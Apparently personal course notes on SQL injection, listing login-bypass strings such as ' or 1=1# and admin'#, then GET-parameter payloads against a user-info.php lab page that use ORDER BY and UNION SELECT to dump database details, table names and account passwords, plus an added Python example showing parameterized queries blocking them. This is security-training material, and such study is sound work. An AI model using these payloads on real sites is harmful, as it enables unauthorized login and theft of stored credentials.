
SQL Injection

Sunday, March 18, 2018 10:25 AM

vUser = rafay
vPasswd = 123456 and 1=1

SELECT count(*) FROM accounts WHERE username=vUser AND password=vPasswd

SELECT count(*) FROM accounts WHERE username='rafay' AND password='123456 and 1=1'

123456" and 1=1

SELECT count(*) FROM accounts WHERE username='hassan' AND password='123456 and 1=1'

126' or 1=1#

SELECT * FROM accounts WHERE username='hassan' AND password='126' or 1=1#'


123456' and 1=1#

123456' and 1=2#

123456' or 1=2#

123' or 1=1#

SELECT * FROM accounts WHERE username='hassan' AND password='123456' or 1=1 #'

or 1=1#';

123456'#

123456 or 1=1#

(1) Test the page with invalid input, e.g. a single quote (').

(2) Test with the actual password followed by the statement (123456' AND 1=1#).

The condition is true, so the login succeeds:

SELECT * FROM accounts WHERE username='test' AND password='123456' AND 1=1#'

The condition is false, so the login fails:


SELECT * FROM accounts WHERE username='hassan' AND password='123456' AND 1=2#'

A wrong password combined with an OR clause whose condition is true, e.g.
SELECT count(*) FROM accounts WHERE username='test' AND password='xyz' or 1=1#'

Injecting into the username field: a correct username followed by a comment (#), so the rest of the statement is not executed.
SELECT * FROM accounts WHERE username='admin' #' AND password='1'

Admin'#
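
Added example (not part of the original notes): the concatenated login query from the statements above next to a parameterized version, run against the same inputs. It assumes Python's sqlite3 as a stand-in for the MySQL back end; the sample rows and the function names (make_db, concatenated_sql, login, run_checks) are constructed for illustration, and the plaintext password column mirrors the queries in these notes.

```python
import sqlite3

def make_db():
    """In-memory table named like the one in the notes; rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("test", "123456"), ("admin", "constructed-secret")])
    return conn

def concatenated_sql(user, passwd):
    """The injectable pattern: user input pasted between the quotes."""
    return ("SELECT count(*) FROM accounts WHERE username='" + user +
            "' AND password='" + passwd + "'")

def login(conn, user, passwd):
    """Hardened form: placeholders keep the input as data, never as SQL text."""
    row = conn.execute(
        "SELECT count(*) FROM accounts WHERE username=? AND password=?",
        (user, passwd)).fetchone()
    return row[0] == 1

# Inputs taken from the notes above.
PAGE_INPUTS = [("test", "xyz' or 1=1#"), ("test", "123456' AND 1=1#"),
               ("admin' #", "1"), ("test", "'")]

def run_checks():
    """Return the login result for the valid pair and for each noted input."""
    conn = make_db()
    results = {"valid": login(conn, "test", "123456")}
    for user, passwd in PAGE_INPUTS:
        results[(user, passwd)] = login(conn, user, passwd)
    return results

if __name__ == "__main__":
    # The string the vulnerable page would send: the quote ends the literal early.
    print(concatenated_sql("test", "xyz' or 1=1#"))
    for key, ok in run_checks().items():
        print(key, "->", "login" if ok else "rejected")
```

With placeholders, the quote and the # arrive as part of the password or username value, so only the genuine pair (test / 123456) logs in.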

osamao

Website Hacking Page 1


Discovering SQL Injection in GET requests

page=user-info.php&username=adnan&password=123456&user-info-php-submit-button=View+Account+Details

page=user-info.php&username=adnan'%23&password=123456&user-info-php-submit-button=View+Account+Details

page=user-info.php&username=adnan' order by 1#&password=123456&user-info-php-submit-button=View+Account+Details

page=user-info.php&username=adnan' order by 1%23&password=123456&user-info-php-submit-button=View+Account+Details

page=user-info.php&username=adnan' order by 100%23&password=123456&user-info-php-submit-button=View+Account+Details

Find the number of columns using ORDER BY

Finding other information using UNION

union select 1,2,3,4,5

page=user-info.php&username=adnan' order by 100%23&password=123456&user-info-php-submit-button=View+Account+Details

union select 1,database(),user(),version(),5

page=user-info.php&username=adnan' union select 1,2,3,4,5%23&password=123456&user-info-php-submit-button=View+Account+Details

page=user-info.php&username=adnan' union select 1,database(),user(),version(),5%23&password=123456&user-info-php-submit-button=View+Account+Details

Select * from accounts where username ='adnan' and password ='123456'

Select * from accounts where username ='adnan' union select 1,2,3,4,5# and password ='123456'

Finding Database Tables

union select 1,table_name,null,null,5 from information_schema.tables

union select 1,username,null,password,5 from accounts

page=user-info.php&username=adnan' union select 1,table_name,null,null,5 from information_schema.tables%23&password=123456&user-info-php-submit-button=View+Account+Details

page=user-info.php&username=adnan' union select 1,username,null,password,5 from accounts%23&password=123456&user-info-php-submit-button=View+Account+Details

Additional Resources
MySQL Community Edition
https://dev.mysql.com/downloads/mysql/

SQL Tutorial
https://www.w3schools.com/sql/default.asp

Unicode URL converter
https://www.url-encode-decode.com/
